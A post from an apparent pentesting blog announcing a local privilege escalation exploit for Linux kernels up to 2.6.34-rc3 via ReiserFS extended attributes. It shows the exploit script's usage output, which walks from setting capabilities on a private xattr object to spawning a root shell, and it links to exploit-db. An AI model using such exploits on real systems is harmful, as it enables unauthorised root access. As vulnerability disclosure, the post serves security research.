Hello there! If you are new here, you might want to subscribe to the RSS feed , Follow us on twitter . You may also subscribe by email .


Share Follow pentesting101 on Twitter

Delivered by FeedBurner

[ NEWS ] : Linux Kernel <= 2.6.34-rc3 ReiserFS xattr Privilege Escalation

Author: Jon Oberheide
Usage:

$ python team-edward.py
[+] checking for reiserfs mount with user_xattr mount option
[+] checking for private xattrs directory at /.reiserfs_priv/xattrs
[+] preparing shell in /tmp
[+] capturing pre-shell snapshot of private xattrs directory
[+] compiling shell in /tmp
[+] setting dummy xattr to get reiserfs object id
[+] capturing post-shell snapshot of private xattrs directory
[+] found 1 new object ids
[+] setting cap_setuid/cap_setgid capabilities on object id 192B.1468
[+] spawning setuid shell...
# id
uid=0(root) gid=0(root) groups=4(adm), ...

Notes:

Obviously requires a ReiserFS filesystem mounted with extended attributes.
Tested on Ubuntu Jaunty 9.10.
'''

http://www.exploit-db.com/exploits/12130

0 comments:

Post a Comment

 
 

WARNING

The tools and informations on this site are provided for legal security research and testing purposes only.
You will be held responsible for your own actions.
have fun and good hunting .

FOLLOW US

Follow pentesting101 on Twitter

Subscribe

Delivered by FeedBurner